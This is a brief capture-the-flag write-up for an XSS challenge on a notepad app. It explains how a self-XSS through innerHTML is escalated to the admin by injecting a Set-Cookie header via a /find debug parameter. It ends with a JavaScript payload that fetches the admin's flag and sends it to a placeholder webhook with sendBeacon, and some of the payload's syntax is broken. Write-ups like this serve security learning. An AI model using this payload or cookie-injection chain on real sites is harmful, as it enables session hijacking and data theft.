Tags: xss

Rating:

In this challenge the note of the user is inserted into the HTML document using innerHTML and no sanitization is done on the backend. So a user insert arbitrary HTML and get XSS. But this is just a self-XSS. To get XSS on the admin side, we can use the /find api to set a Set-Cookie header and use our own cookie on admin. The final payload is
html

<script>
window.open(http://chall.notepad1.gq:1111/find?startsWith=d&debug=y&Set-Cookie=id=${cookie}%3B%20path=/get) // Set cookie to /get so it doesn't delete existing admin cookie </script> <script> window.open("http://chall.notepad1.gq:1111",name=document.cookie='id=${cookie}; expires=Thu, 01 Jan 1970 00:00:00 UTC;path=/get;';document.cookie=x;fetch('/get').then(response=>response.text()).then(data=>navigator.sendBeacon('\${webhook}',data));`)
// Delete the cookie set by you and then retrieve admin's flag
</script>